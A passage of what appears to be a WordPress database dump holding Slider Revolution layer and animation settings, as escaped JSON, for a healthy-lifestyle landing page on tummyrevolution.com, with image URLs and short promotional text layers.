From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"0\",\"scaleX\":\"0.9\",\"scaleY\":\"0.9\",\"opacity\":\"0\",\"rotationX\":\"0\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"top\"},\"n\":{\"v\":\"top\"},\"t\":{\"v\":\"top\"},\"m\":{\"v\":\"top\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1500,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1500,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3500,\"startRelative\":1990,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"10\":{\"text\":\"Packed with everything you\'ll need for creating an incredible website dedicated to healthy lifestyle & nutrition.\\n\",\"alias\":\"Lorem ipsum dolor si...\",\"uid\":10,\"size\":{\"width\":{\"d\":{\"v\":\"532px\",\"e\":true},\"n\":{\"v\":\"532px\",\"e\":true},\"t\":{\"v\":\"375px\",\"e\":true},\"m\":{\"v\":\"333px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"82px\",\"e\":true}},\"originalWidth\":\"532px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-15px\",\"e\":true},\"n\":{\"v\":\"-15px\",\"e\":true},\"t\":{\"v\":\"5px\",\"e\":true},\"m\":{\"v\":\"5px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"95px\",\"e\":true},\"n\":{\"v\":\"95px\",\"e\":true},\"t\":{\"v\":\"-5px\",\"e\":true},\"m\":{\"v\":\"-5px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":13,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":13,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":3500}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3500,\"startRelative\":3190,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"v\":\"18px\",\"e\":true},\"m\":{\"v\":\"16px\",\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"27px\",\"e\":true},\"n\":{\"v\":\"27px\",\"e\":true},\"t\":{\"v\":\"27px\",\"e\":true},\"m\":{\"v\":\"27px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false},\"type\":\"text\",\"version\":\"6.6.0\"}}','{\"0\":\"\",\"version\":\"6.6.0\"}'),(24,10,1,'{\"title\":\"Slide\",\"bg\":{\"type\":\"solid\",\"color\":\"#ba886a\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"timeline\":{\"slots\":[\"default\"],\"duration\":[600]},\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','{\"1\":{\"text\":\"Image 1\",\"alias\":\"Papir\",\"uid\":1,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/landing-slide4-graphic2.png\",\"imageId\":3505},\"size\":{\"width\":{\"d\":{\"v\":\"982px\",\"e\":true},\"n\":{\"v\":\"1054px\",\"e\":true},\"t\":{\"v\":\"1130px\",\"e\":true},\"m\":{\"v\":\"777px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"924px\",\"e\":true},\"n\":{\"v\":\"992px\",\"e\":true},\"t\":{\"v\":\"1063px\",\"e\":true},\"m\":{\"v\":\"731px\",\"e\":true}},\"originalWidth\":914,\"originalHeight\":860,\"aspectRatio\":{\"d\":{\"v\":1.0627906976744186},\"n\":{\"v\":1.0627906976744186},\"t\":{\"v\":1.0627906976744186},\"m\":{\"v\":1.0627906976744186}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"v\":\"4px\",\"e\":true},\"m\":{\"v\":\"-112px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-2px\",\"e\":true},\"n\":{\"v\":\"-2px\",\"e\":true},\"t\":{\"v\":\"-17px\",\"e\":true},\"m\":{\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":5,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"-100%\"},\"n\":{\"v\":\"-100%\"},\"t\":{\"v\":\"-100%\"},\"m\":{\"v\":\"-100%\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"0\",\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":\"0deg\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"use\":true,\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":900,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"use\":true},\"timeline\":{\"speed\":900,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1200,\"start\":9000,\"startRelative\":8090,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"image\",\"version\":\"6.6.0\"},\"2\":{\"text\":\"START SELLING NOW\",\"alias\":\"Subtitlle\",\"uid\":2,\"size\":{\"width\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"1px\",\"e\":true},\"n\":{\"v\":\"-5px\",\"e\":true},\"t\":{\"v\":\"3px\",\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"-313px\",\"e\":true},\"n\":{\"v\":\"-275px\",\"e\":true},\"t\":{\"v\":\"-299px\",\"e\":true},\"m\":{\"v\":\"38px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"e\":true}},\"zIndex\":6,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8690,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"v\":\"14px\",\"e\":true},\"n\":{\"v\":\"14px\",\"e\":true},\"t\":{\"v\":\"14px\",\"e\":true},\"m\":{\"v\":\"10px\",\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"v\":\"3px\",\"e\":true},\"n\":{\"v\":\"3px\",\"e\":true},\"t\":{\"v\":\"3px\",\"e\":true},\"m\":{\"v\":\"3px\",\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"40px\",\"e\":true},\"n\":{\"v\":\"40px\",\"e\":true},\"t\":{\"v\":\"40px\",\"e\":true},\"m\":{\"v\":\"40px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.6.0\"},\"4\":{\"text\":\"Image 4\",\"alias\":\"Image 4\",\"uid\":4,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/landing-slide4-graphic1.png\",\"imageId\":3509},\"size\":{\"width\":{\"d\":{\"v\":\"593px\",\"e\":true},\"n\":{\"v\":\"480px\",\"e\":true},\"t\":{\"v\":\"601px\",\"e\":true},\"m\":{\"v\":\"291px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"1124px\",\"e\":true},\"n\":{\"v\":\"910px\",\"e\":true},\"t\":{\"v\":\"1140px\",\"e\":true},\"m\":{\"v\":\"551px\",\"e\":true}},\"originalWidth\":593,\"originalHeight\":1124,\"aspectRatio\":{\"d\":{\"v\":0.5275800711743772},\"n\":{\"v\":0.5275800711743772},\"t\":{\"v\":0.5275800711743772},\"m\":{\"v\":0.5275800711743772}}},\"position\":{\"x\":{\"d\":{\"v\":\"387px\",\"e\":true},\"n\":{\"v\":\"342px\",\"e\":true},\"t\":{\"v\":\"-66px\",\"e\":true},\"m\":{\"v\":\"11px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"174px\",\"e\":true},\"n\":{\"v\":\"176px\",\"e\":true},\"t\":{\"v\":\"86px\",\"e\":true},\"m\":{\"v\":\"94px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"right\",\"e\":true},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":7,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":7,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim 